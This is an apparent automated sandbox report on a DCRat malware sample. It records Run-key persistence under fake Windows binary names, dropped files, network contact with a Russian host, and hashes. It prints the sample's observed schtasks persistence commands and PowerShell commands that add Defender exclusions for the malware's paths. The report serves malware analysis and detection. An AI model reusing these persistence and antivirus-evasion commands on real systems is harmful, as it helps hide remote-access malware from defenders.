| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Recovery\WindowsRE\Registry.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\SchCache\\SppExtComObj.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Recovery\\WindowsRE\\Registry.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files\\Windows NT\\Accessories\\wininit.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Recovery\\WindowsRE\\Registry.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\SchCache\\SppExtComObj.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\Program Files\\Windows Portable Devices\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\Program Files\\Windows Portable Devices\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files\\Windows NT\\Accessories\\wininit.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SchCache\SppExtComObj.exe | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| File created | C:\Windows\SchCache\e1ef82546f0b02 | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| File opened for modification | C:\Windows\SchCache\RCX6BE1.tmp | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| File opened for modification | C:\Windows\SchCache\SppExtComObj.exe | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe
"C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\backgroundTaskHost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\upfc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\upfc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\upfc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\es-ES\StartMenuExperienceHost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\es-ES\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\es-ES\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\Accessories\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows NT\Accessories\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Windows\SchCache\SppExtComObj.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\SchCache\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Windows\SchCache\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\backgroundTaskHost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\PackageManifests\upfc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\es-ES\StartMenuExperienceHost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Registry.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\en-US\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SchCache\SppExtComObj.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'
C:\Recovery\WindowsRE\Registry.exe
"C:\Recovery\WindowsRE\Registry.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a0913612.xsph.ru | udp |
| RU | 141.8.197.42:80 | a0913612.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0913612.xsph.ru | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.197.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
Files
memory/4912-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp
memory/4912-1-0x00000000006F0000-0x00000000008EA000-memory.dmp
memory/4912-2-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/4912-3-0x0000000001160000-0x000000000116E000-memory.dmp
memory/4912-4-0x000000001B4F0000-0x000000001B4F8000-memory.dmp
memory/4912-5-0x000000001B520000-0x000000001B53C000-memory.dmp
memory/4912-6-0x000000001BBE0000-0x000000001BC30000-memory.dmp
memory/4912-8-0x000000001B540000-0x000000001B556000-memory.dmp
memory/4912-7-0x000000001B500000-0x000000001B510000-memory.dmp
memory/4912-9-0x000000001B560000-0x000000001B570000-memory.dmp
memory/4912-10-0x000000001B570000-0x000000001B57C000-memory.dmp
memory/4912-11-0x000000001BB90000-0x000000001BBA2000-memory.dmp
memory/4912-12-0x000000001C160000-0x000000001C688000-memory.dmp
memory/4912-13-0x000000001BBC0000-0x000000001BBCC000-memory.dmp
memory/4912-14-0x000000001BBD0000-0x000000001BBDC000-memory.dmp
memory/4912-15-0x000000001BD30000-0x000000001BD38000-memory.dmp
memory/4912-17-0x000000001BD40000-0x000000001BD4C000-memory.dmp
memory/4912-16-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/4912-20-0x000000001BE70000-0x000000001BE7E000-memory.dmp
memory/4912-19-0x000000001BE60000-0x000000001BE68000-memory.dmp
memory/4912-22-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/4912-21-0x000000001BE80000-0x000000001BE8C000-memory.dmp
memory/4912-23-0x000000001BE90000-0x000000001BE9A000-memory.dmp
memory/4912-18-0x000000001BD50000-0x000000001BD5E000-memory.dmp
memory/4912-24-0x000000001BEA0000-0x000000001BEAC000-memory.dmp
C:\Recovery\WindowsRE\Registry.exe
| MD5 | 2a0c47d8f5e14cfda0437c59c57fbce9 |
| SHA1 | a1c37d6d20049b2bc1a1db1d99b4f5b7fcd9c2b0 |
| SHA256 | 22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 |
| SHA512 | 790702639348c58c99dcf4bd35d3b47bd544c7e4cd43fab90b5643f2917e3549e8e92a09d7aea3fed05766c086bdecdadf70c392289c46dc667e69cde73595d5 |
memory/868-165-0x00000219037D0000-0x00000219037F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4tcmvhop.m4a.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4912-258-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6c47b3f4e68eebd47e9332eebfd2dd4e |
| SHA1 | 67f0b143336d7db7b281ed3de5e877fa87261834 |
| SHA256 | 8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c |
| SHA512 | 0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5f0ddc7f3691c81ee14d17b419ba220d |
| SHA1 | f0ef5fde8bab9d17c0b47137e014c91be888ee53 |
| SHA256 | a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5 |
| SHA512 | 2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10e081d22e02f2f8d7ab5e3fb33079bb |
| SHA1 | 0eeaa68bb6ef9e2083860ac526e8c99b6659d90a |
| SHA256 | c31407b25ce1bd518a4540e44299000d97a3611422a90322c7979f997b1c1317 |
| SHA512 | 6094a4f9e8d6b00f0a8d96b5c1b8b7dd9d72ea942e247d374ed60b7e0116e9bff571d0ecc085c5c1b05e0868d251819f1c48eaf4444503db37c80c070ae98782 |